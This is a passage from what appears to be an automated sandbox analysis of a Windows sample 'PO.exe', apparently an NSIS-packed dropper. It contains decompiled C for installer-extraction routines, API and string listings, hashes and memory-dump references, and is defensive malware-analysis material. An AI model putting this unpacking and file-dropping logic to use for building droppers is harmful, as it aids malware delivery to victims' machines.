						__eflags = _v36 - 0x74666f73;
						if(_v36 != 0x74666f73) {
							goto L22;
						}
						__eflags = _v40 - 0x6c6c754e;
						if(_v40 != 0x6c6c754e) {
							goto L22;
						}
						_t89 = _v24;
						__eflags = _t89 - _t101;
						if(_t89 > _t101) {
							goto L33;
						}
						_a4 = _a4 | _t94;
						_t95 =  *0x789930; // 0x378a6
						__eflags = _a4 & 0x00000008;
						 *0x7a2f8c = _t95;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t24 = _t89 - 4; // 0x1c
							_t101 = _t24;
							__eflags = _t92 - _t101;
							if(_t92 > _t101) {
								_t92 = _t101;
							}
							goto L22;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L15;
						L22:
						__eflags = _t101 -  *0x79d938; // 0x378aa
						if(__eflags < 0) {
							_v16 = E00405D2F(_v16, 0x795938, _t92);
						}
						 *0x789930 =  *0x789930 + _t92;
						_t101 = _t101 - _t92;
						__eflags = _t101;
					} while (_t101 > 0);
					__eflags = _v8;
					if(_v8 != 0) {
						DestroyWindow(_v8);
					}
					goto L27;
				}
			}
































                                            0x00402c42
                                            0x00402c45
                                            0x00402c4b
                                            0x00402c4e
                                            0x00402c51
                                            0x00402c64
                                            0x00402c6a
                                            0x00402c7d
                                            0x00402c82
                                            0x00402c85
                                            0x00402c8b
                                            0x00000000
                                            0x00402c8d
                                            0x00402c98
                                            0x00402ca0
                                            0x00402ca6
                                            0x00402ca8
                                            0x00402cad
                                            0x00402caf
                                            0x00402dde
                                            0x00402de0
                                            0x00402de6
                                            0x00000000
                                            0x00000000
                                            0x00402de8
                                            0x00402deb
                                            0x00402e0f
                                            0x00402e1a
                                            0x00402e25
                                            0x00402e2a
                                            0x00402e2d
                                            0x00402e2e
                                            0x00402e2f
                                            0x00402e31
                                            0x00402e36
                                            0x00402e39
                                            0x00402e5a
                                            0x00402e5e
                                            0x00402e64
                                            0x00402e66
                                            0x00402e66
                                            0x00402e66
                                            0x00402e6e
                                            0x00402e72
                                            0x00402e79
                                            0x00402e7e
                                            0x00402e80
                                            0x00402e80
                                            0x00402e80
                                            0x00402e88
                                            0x00402e88
                                            0x00402e8b
                                            0x00402e8c
                                            0x00402e8c
                                            0x00402e8f
                                            0x00402e91
                                            0x00402e91
                                            0x00402e91
                                            0x00402e9b
                                            0x00402ea1
                                            0x00402eaf
                                            0x00402eb4
                                            0x00000000
                                            0x00402eb4
                                            0x00402e3c
                                            0x00000000
                                            0x00402e3c
                                            0x00402df3
                                            0x00402dfe
                                            0x00402e03
                                            0x00402e05
                                            0x00000000
                                            0x00000000
                                            0x00402e0a
                                            0x00402e0d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402cb5
                                            0x00402cb5
                                            0x00402cba
                                            0x00402cbe
                                            0x00402cc5
                                            0x00402cca
                                            0x00402ccc
                                            0x00402cce
                                            0x00402cce
                                            0x00402cd6
                                            0x00402cdb
                                            0x00402cdd
                                            0x00402e49
                                            0x00402e4d
                                            0x00402e52
                                            0x00402e52
                                            0x00402e42
                                            0x00000000
                                            0x00402e42
                                            0x00402ce5
                                            0x00402ceb
                                            0x00402d6c
                                            0x00402d70
                                            0x00402d72
                                            0x00402d75
                                            0x00402d7f
                                            0x00402d85
                                            0x00402d87
                                            0x00402da3
                                            0x00402da3
                                            0x00402d77
                                            0x00402d78
                                            0x00402d78
                                            0x00402d75
                                            0x00000000
                                            0x00402d70
                                            0x00402cf8
                                            0x00402cfd
                                            0x00402d00
                                            0x00402d06
                                            0x00000000
                                            0x00000000
                                            0x00402d0c
                                            0x00402d13
                                            0x00000000
                                            0x00000000
                                            0x00402d19
                                            0x00402d20
                                            0x00000000
                                            0x00000000
                                            0x00402d26
                                            0x00402d2d
                                            0x00000000
                                            0x00000000
                                            0x00402d2f
                                            0x00402d36
                                            0x00000000
                                            0x00000000
                                            0x00402d38
                                            0x00402d3b
                                            0x00402d3d
                                            0x00000000
                                            0x00000000
                                            0x00402d43
                                            0x00402d46
                                            0x00402d4c
                                            0x00402d50
                                            0x00402d56
                                            0x00402d5e
                                            0x00402d5e
                                            0x00402d61
                                            0x00402d61
                                            0x00402d64
                                            0x00402d66
                                            0x00402d68
                                            0x00402d68
                                            0x00000000
                                            0x00402d66
                                            0x00402d58
                                            0x00402d5c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402da6
                                            0x00402da6
                                            0x00402dac
                                            0x00402dbc
                                            0x00402dbc
                                            0x00402dbf
                                            0x00402dc5
                                            0x00402dc7
                                            0x00402dc7
                                            0x00402dcf
                                            0x00402dd3
                                            0x00402dd8
                                            0x00402dd8
                                            0x00000000
                                            0x00402dd3

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402C45
                                            • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
                                              • Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                              • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                            • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
                                            • DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                            • "C:\Users\user\Desktop\PO.exe" , xrefs: 00402C41
                                            • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
                                            • Error launching installer, xrefs: 00402C8D
                                            • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
                                            • Null, xrefs: 00402D2F
                                            • Inst, xrefs: 00402D19
                                            • soft, xrefs: 00402D26
                                            • verifying installer: %d%%, xrefs: 00402D89
                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                            • String ID: "C:\Users\user\Desktop\PO.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                            • API String ID: 2181728824-1242243482
                                            • Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                            • Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
                                            • Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                            • Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040179D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151stringtimeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 57%
                                            			E0040179D(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				long _t49;
				long _t62;
				signed char _t63;
				long _t64;
				void* _t66;
				long _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t82;
				CHAR* _t84;
				void* _t87;

				_t77 = __ebx;
				_t84 = E00402A9A(0x31);
				 *(_t87 - 0x34) = _t84;
				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
				_t33 = E00405538(_t84);
				_push(_t84);
				if(_t33 == 0) {
					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c18);
					E004059BF();
				}
				E00405BFB(0x409c18);
				while(1) {
					__eflags =  *(_t87 + 8) - 3;
					if( *(_t87 + 8) >= 3) {
						_t66 = E00405C94(0x409c18);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t87 - 0x18);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t87 + 8) = _t72;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) == _t77) {
						_t63 = GetFileAttributesA(0x409c18); // executed
						_t64 = _t63 & 0x000000fe;
						__eflags = _t64;
						SetFileAttributesA(0x409c18, _t64); // executed
					}
					__eflags =  *(_t87 + 8) - 1;
					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t87 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) != _t77) {
						E00404D62(0xffffffe2,  *(_t87 - 0x34));
						__eflags =  *(_t87 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t87 - 4)) = 1;
						}
						L31:
						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
						__eflags =  *0x7a3008;
						goto L32;
					} else {
						E004059BF(0x40a418, 0x7a4000);
						E004059BF(0x7a4000, 0x409c18);
						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\alfons\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll",  *((intOrPtr*)(_t87 - 0x10)));
						E004059BF(0x7a4000, 0x40a418);
						_t62 = E004052BF("C:\Users\alfons\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll",  *(_t87 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x7a3008 =  *0x7a3008 + 1;
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c18);
								_push(0xfffffffa);
								E00404D62();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404D62(0xffffffea,  *(_t87 - 0x34));
				 *0x4092a0 =  *0x4092a0 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t87 - 8));
				_push( *((intOrPtr*)(_t87 - 0x1c)));
				_t43 = E00402EBD(); // executed
				 *0x4092a0 =  *0x4092a0 - 1;
				__eflags =  *(_t87 - 0x18) - 0xffffffff;
				_t82 = _t43;
				if( *(_t87 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t87 - 8)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
					} else {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
						lstrcatA(0x409c18,  *(_t87 - 0x34));
					}
					_push(0x200010);
					_push(0x409c18);
					E004052BF();
					goto L29;
				}
				goto L33;
			}


















                                            0x0040179d
                                            0x004017a4
                                            0x004017ad
                                            0x004017b0
                                            0x004017b3
                                            0x004017b8
                                            0x004017c0
                                            0x004017dc
                                            0x004017c2
                                            0x004017c2
                                            0x004017c3
                                            0x004017c3
                                            0x004017e2
                                            0x004017ec
                                            0x004017ec
                                            0x004017f0
                                            0x004017f3
                                            0x004017f8
                                            0x004017fa
                                            0x004017fc
                                            0x00401801
                                            0x00401801
                                            0x0040180c
                                            0x0040180c
                                            0x0040181d
                                            0x0040181f
                                            0x0040181f
                                            0x00401820
                                            0x00401820
                                            0x00401823
                                            0x00401826
                                            0x00401829
                                            0x0040182f
                                            0x0040182f
                                            0x00401833
                                            0x00401833
                                            0x0040183b
                                            0x0040184a
                                            0x0040184f
                                            0x00401852
                                            0x00401855
                                            0x00000000
                                            0x00000000
                                            0x00401857
                                            0x0040185a
                                            0x004018b4
                                            0x004018b9
                                            0x004015ca
                                            0x004026da
                                            0x004026da
                                            0x0040292f
                                            0x00402932
                                            0x00402932
                                            0x00000000
                                            0x0040185c
                                            0x00401862
                                            0x0040186d
                                            0x0040187a
                                            0x00401885
                                            0x0040189b
                                            0x0040189b
                                            0x0040189e
                                            0x00000000
                                            0x004018a4
                                            0x004018a4
                                            0x004018a5
                                            0x004018c2
                                            0x00402938
                                            0x00402938
                                            0x00402938
                                            0x004018a7
                                            0x004018a7
                                            0x004018a8
                                            0x00401495
                                            0x00402293
                                            0x00402293
                                            0x00402293
                                            0x004018a5
                                            0x0040189e
                                            0x0040293a
                                            0x0040293e
                                            0x0040293e
                                            0x004018d2
                                            0x004018d7
                                            0x004018dd
                                            0x004018de
                                            0x004018df
                                            0x004018e2
                                            0x004018e5
                                            0x004018ea
                                            0x004018f0
                                            0x004018f4
                                            0x004018f6
                                            0x004018fe
                                            0x0040190a
                                            0x004018f8
                                            0x004018f8
                                            0x004018fc
                                            0x00000000
                                            0x00000000
                                            0x004018fc
                                            0x00401913
                                            0x00401919
                                            0x0040191b
                                            0x00000000
                                            0x00401921
                                            0x00401921
                                            0x00401924
                                            0x0040193c
                                            0x00401926
                                            0x00401929
                                            0x00401932
                                            0x00401932
                                            0x00401941
                                            0x00401946
                                            0x0040228e
                                            0x00000000
                                            0x0040228e
                                            0x00000000

                                            APIs
                                            • lstrcatA.KERNEL32(00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
                                            • CompareFileTime.KERNEL32(-00000014,?,Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
                                            • GetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
                                            • SetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,00000000), ref: 00401833
                                              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
                                              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll$Ivlfdpdlcleoxmzl
                                            • API String ID: 1152937526-2144022399
                                            • Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                            • Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
                                            • Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                            • Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402EBD, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 173fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 95%
                                            			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t68;
				void* _t69;
				int _t74;
				long _t75;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				void* _t99;
				void* _t100;
				long _t101;
				int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t99 = _a12;
				_v12 = _t102;
				if(_t99 == 0) {
					_v12 = 0x8000;
				}
				_v8 = 0;
				_v16 = _t99;
				if(_t99 == 0) {
					_v16 = 0x78d938;
				}
				_t66 = _a4;
				if(_a4 >= 0) {
					E004030FF( *0x7a2fd8 + _t66);
				}
				_t68 = E004030CD( &_a16, 4); // executed
				if(_t68 == 0) {
					L44:
					_push(0xfffffffd);
					goto L45;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t99 != 0) {
							if(_a16 < _t102) {
								_t102 = _a16;
							}
							if(E004030CD(_t99, _t102) != 0) {
								_v8 = _t102;
								L47:
								return _v8;
							} else {
								goto L44;
							}
						}
						if(_a16 <= 0) {
							goto L47;
						}
						while(1) {
							_t103 = _v12;
							if(_a16 < _t103) {
								_t103 = _a16;
							}
							if(E004030CD(0x789938, _t103) == 0) {
								goto L44;
							}
							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed
							if(_t74 == 0 || _t103 != _a12) {
								L30:
								_push(0xfffffffe);
								L45:
								_pop(_t69);
								return _t69;
							} else {
								_v8 = _v8 + _t103;
								_a16 = _a16 - _t103;
								if(_a16 > 0) {
									continue;
								}
								goto L47;
							}
						}
						goto L44;
					}
					_t75 = GetTickCount();
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_v20 = _t75;
					 *0x40b038 = 0xb;
					 *0x40b050 = 0;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L47;
					}
					while(1) {
						L10:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030CD(0x789938, _t104) == 0) {
							goto L44;
						}
						_a16 = _a16 - _t104;
						 *0x40b028 = 0x789938;
						 *0x40b02c = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b030 = _t100;
							 *0x40b034 = _v12;
							_t79 = E00405D9D(0x40b028);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b030; // 0x78e938
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404D62(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L10;
								}
								goto L47;
							} else {
								if(_a12 != 0) {
									_v12 = _v12 - _t106;
									_v8 = _v8 + _t106;
									_t82 =  *0x40b030; // 0x78e938
									_v16 = _t82;
									if(_v12 < 1) {
										goto L47;
									}
									L25:
									if(_v28 != 4) {
										continue;
									}
									goto L47;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L30;
								} else {
									_v8 = _v8 + _t106;
									goto L25;
								}
							}
						}
						_push(0xfffffffc);
						goto L45;
					}
					goto L44;
				}
			}



























                                            0x00402ec5
                                            0x00402ec9
                                            0x00402ed0
                                            0x00402ed3
                                            0x00402ed5
                                            0x00402ed5
                                            0x00402ede
                                            0x00402ee1
                                            0x00402ee4
                                            0x00402ee6
                                            0x00402ee6
                                            0x00402eed
                                            0x00402ef2
                                            0x00402efd
                                            0x00402efd
                                            0x00402f08
                                            0x00402f0f
                                            0x004030bb
                                            0x004030bb
                                            0x00000000
                                            0x00402f15
                                            0x00402f19
                                            0x0040305e
                                            0x004030ab
                                            0x004030ad
                                            0x004030ad
                                            0x004030b9
                                            0x004030c0
                                            0x004030c3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004030b9
                                            0x00403063
                                            0x00000000
                                            0x00000000
                                            0x0040306a
                                            0x0040306a
                                            0x00403070
                                            0x00403072
                                            0x00403072
                                            0x0040307e
                                            0x00000000
                                            0x00000000
                                            0x0040308b
                                            0x00403093
                                            0x00403058
                                            0x00403058
                                            0x004030bd
                                            0x004030bd
                                            0x00000000
                                            0x0040309a
                                            0x0040309a
                                            0x0040309d
                                            0x004030a4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004030a6
                                            0x00403093
                                            0x00000000
                                            0x0040306a
                                            0x00402f1f
                                            0x00402f25
                                            0x00402f25
                                            0x00402f2c
                                            0x00402f32
                                            0x00402f39
                                            0x00402f3f
                                            0x00402f42
                                            0x00000000
                                            0x00000000
                                            0x00402f4d
                                            0x00402f4d
                                            0x00402f4d
                                            0x00402f55
                                            0x00402f57
                                            0x00402f57
                                            0x00402f63
                                            0x00000000
                                            0x00000000
                                            0x00402f69
                                            0x00402f6c
                                            0x00402f72
                                            0x00402f78
                                            0x00402f78
                                            0x00402f83
                                            0x00402f89
                                            0x00402f8e
                                            0x00402f95
                                            0x00402f98
                                            0x00000000
                                            0x00000000
                                            0x00402f9e
                                            0x00402fa4
                                            0x00402fa6
                                            0x00402fb3
                                            0x00402fb5
                                            0x00402fe3
                                            0x00402fe9
                                            0x00402ff2
                                            0x00402ff7
                                            0x00402ff7
                                            0x00402ffe
                                            0x0040304c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403000
                                            0x00403003
                                            0x00403025
                                            0x00403028
                                            0x0040302b
                                            0x00403034
                                            0x00403037
                                            0x00000000
                                            0x00000000
                                            0x0040303d
                                            0x00403041
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403047
                                            0x00403011
                                            0x00403019
                                            0x00000000
                                            0x00403020
                                            0x00403020
                                            0x00000000
                                            0x00403020
                                            0x00403019
                                            0x00402ffe
                                            0x00403054
                                            0x00000000
                                            0x00403054
                                            0x00000000
                                            0x00402f4d

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402F1F
                                            • GetTickCount.KERNEL32 ref: 00402FA6
                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
                                            • wsprintfA.USER32 ref: 00402FE3
                                            • WriteFile.KERNELBASE(00000000,00000000,0078E938,7FFFFFFF,00000000), ref: 00403011
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CountTick$FileWritewsprintf
                                            • String ID: ... %d%%$8x
                                            • API String ID: 4209647438-795837185
                                            • Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                            • Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
                                            • Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                            • Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 025511D7, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 341memoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 025514EE
                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0255154D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.240226269.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                            Similarity
                                            • API ID: AllocCreateFileVirtual
                                            • String ID: 8b1e06cf0b1b4013b025a01118144012
                                            • API String ID: 1475775534-3985312390
                                            • Opcode ID: bcc4889964027c063f899160eb8a9f6fb02c2b1a3394accc41170fd4b3af689f
                                            • Instruction ID: 680f0b1023e1029403a5474c642cd0b1fe37cf15b8504119767672700181339d
                                            • Opcode Fuzzy Hash: bcc4889964027c063f899160eb8a9f6fb02c2b1a3394accc41170fd4b3af689f
                                            • Instruction Fuzzy Hash: 82E14735D54398EEEB21CBA4DC15BEDBBB5AF04710F10409AEA08FA1D1D7B50A84DF1A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02550705, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02550807
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 025509D4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.240226269.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                            Similarity
                                            • API ID: CreateFileFreeVirtual
                                            • String ID:
                                            • API String ID: 204039940-0
                                            • Opcode ID: c69edf1f60cf3f7593567da81f34f7c070dc7a2f222ebb339bb867568812a015
